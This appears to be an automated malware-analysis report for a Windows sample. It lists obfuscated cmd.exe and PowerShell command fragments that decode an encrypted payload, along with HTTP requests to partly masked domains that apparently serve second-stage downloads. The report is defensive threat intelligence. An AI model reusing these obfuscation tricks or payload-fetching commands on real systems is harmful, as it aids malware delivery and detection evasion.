Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' FuzhafKTH tFQhRzGsuBHDdMrGtihAnqXjDXC apSXDGwvNbFSP & %C^om^S^pEc% %C^om^S^pEc% /V /c set %vJjufuzQKaJzrJs%=QDzHzITwiIYTSF&&set %NczIvzwAMWsntZ%=p&&set %c...
Network activity
Connects to
- 'dr###amill.com':80
- 'me####d-kaffe.dk':80
- 'pr###owice.eu':80
- 'be##c.ro':443
TCP
HTTP GET requests
- http://dr###amill.com/f1XAhV/
- http://me####d-kaffe.dk/oDgHybA/
- http://pr###owice.eu/aupD/
Other
- 'be##c.ro':443
UDP
- DNS ASK dr###amill.com
- DNS ASK sm####onsulting.com
- DNS ASK me####d-kaffe.dk
- DNS ASK pr###owice.eu
- DNS ASK be##c.ro
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' FuzhafKTH tFQhRzGsuBHDdMrGtihAnqXjDXC apSXDGwvNbFSP & %C^om^S^pEc% %C^om^S^pEc% /V /c set %vJjufuzQKaJzrJs%=QDzHzITwiIYTSF&&set %NczIvzwAMWsntZ%=p&&set %c...' (with hidden window)
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ( [RuntIme.inteROpsERvicES.MARShal]::PTRToStrINGANSi([RuNtimE.INTERoPSErvICeS.MArShAL]::sEcuRESTrinGToGLoBaLALLocaNSi($('76492d1116743f0423413b16050a5345MgB8AE4ASwAvAC8AVwBxAE8ATgBQACsAMgBCAD...
